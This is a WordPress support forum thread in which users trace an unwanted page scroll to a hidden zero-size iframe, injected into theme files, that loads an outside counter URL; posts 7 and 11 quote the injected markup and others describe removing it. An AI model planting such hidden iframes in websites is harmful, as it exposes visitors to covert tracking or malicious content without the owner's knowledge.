Pages react as if there's an anchor in Firefox (11 posts)

  1. imShack
    Posted 6 years ago #

    Hello Folks,

    This is the first time I've run into a problem with WordPress
    that I wasn't able to figure it out.

    After the site loads in Firefox, it scrolls to the bottom of
    the page automatically, as if there's an anchor there.

    I have loaded several different templates with the same results.

    This error DOES NOT occur with the default(Kubrick) template though.

    Any ideas? Here's the site url:



  2. alism
    Posted 6 years ago #

    If it's not your theme, chances are it's a plugin. Disable them one by one and see if you can figure out which one it is.

  3. xdesi
    Posted 6 years ago #

    When you tried with Kubrick were the same plugins still activated?

    Have you tried temporarliy just disabling plugins for a second on this theme to see if it helps at all?

  4. imShack
    Posted 6 years ago #


    I already tried deactivating the plugins one at a time.
    I thought for sure it was one of them causing it.

    xdesi: yes, I had reactivated the plugins when I tried the
    Kubrick theme.

  5. esmi
    Forum Moderator
    Posted 6 years ago #

    Looks like it's being caused by the JavaScript in your theme template. I can't identify the culprit but the page loads fine (ie no jump) if JavaScript is disabled.

  6. imShack
    Posted 6 years ago #

    esmi: That worked for me also.

    Since the only common denominator with the custom
    themes I was testing is Google Adsense, I'll have to
    assume that's the problem.

    If/when I pinpoint the problem, I'll post it here.

    Thanks everyone!

  7. xdesi
    Posted 6 years ago #

    I suspect it's to do with the iFrame at the bottom:

    <iframe src='http://globalwat.com/counter/in.cgi?four' align='center' width='0' height='0' frameborder='0'></iframe>

    Strange what is this? If I visit globalwat.com it re-directs me to Google Analytics, but Google searches don't show anything about the site really..

  8. imShack
    Posted 6 years ago #

    It was the iFrame.

    Thanks everyone.

  9. Scytle
    Posted 6 years ago #

    I am having the same problem with the same iframe, how did you remove it and where was it hiding? I don't see it in my footer.php or any of the other theme files.

    what plugins did you have?

  10. Scytle
    Posted 6 years ago #

    found it, seems I was looking at the local copy of the footer.php, when I downloaded the server copy it was right there above the analytics script, deleted and fixed!

  11. Xerotone
    Posted 6 years ago #

    I had this problem with the following code in index.php:

    <!-- ~ --><iframe src='http://globalwat.com/counter/in.cgi?default' align='center' width='0' height='0' frameborder='0'></iframe><!-- ~ -->

    How does this sort of thing get injected? I do my best to keep things secure... just wondering about the mechanism so I might be able to correct the issue.

Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.